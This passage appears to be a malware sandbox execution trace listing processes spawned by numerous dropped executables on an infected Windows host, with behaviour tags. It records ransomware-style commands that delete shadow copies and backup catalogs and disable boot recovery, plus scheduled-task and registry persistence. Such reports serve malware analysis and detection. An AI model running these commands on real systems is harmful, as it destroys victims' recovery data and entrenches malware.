                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=2216 /prefetch:8
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:8912
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2668 /prefetch:1
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          PID:8292
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2628 /prefetch:1
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          PID:9080
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=3120 /prefetch:8
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:9052
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1520 /prefetch:2
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=1748 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:5548
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=3528 /prefetch:8
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:8068
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=3596 /prefetch:8
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:7728
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5524
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C334.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                  PID:9036
                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                              PID:6864
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:5332
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D515.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D515.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              PID:7600
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4E0.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4E0.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:7620
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2097.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2097.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:8096
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2A5C.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2A5C.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:7228
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3F5C.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3F5C.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:428
                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                    PID:7380
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2480
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\68BF.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\68BF.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      PID:7948
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B384.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B384.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      PID:8136
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B73F.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B73F.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                      PID:8156
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                        PID:7036
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies extensions of user files
                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          PID:5996
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1560
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                                              PID:8228
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:3588
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3024
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6388
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:7832
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:8216
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                      notepad.exe
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5988
                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    PID:4728
                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{127324f0-50ed-554f-b458-80054a8f4d73}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:4388
                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2336
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CE71.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\CE71.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4480
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:1372
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Whiskery.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:5588
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6828
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:8096
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                              PID:2336
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:7304
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:4888
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                            PID:7208
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D50A.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D50A.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:8188
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D50A.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\D50A.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:8980
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D50A.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\D50A.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:8992
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DA79.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DA79.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:7868
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:7892
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:1564
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:2040
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:2888
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:2884
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3336
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              PID:7120
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6384
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                PID:7752
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:7912
                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                  PID:4624
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:2148
                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                  PID:7444
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7984
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                    PID:7792
                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:8956
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\52D7.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\52D7.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5360
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\52D7.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:9120
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                            PID:8312
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:7988
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                        PID:8380
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:8432
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:8960
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:5576
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:6320
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
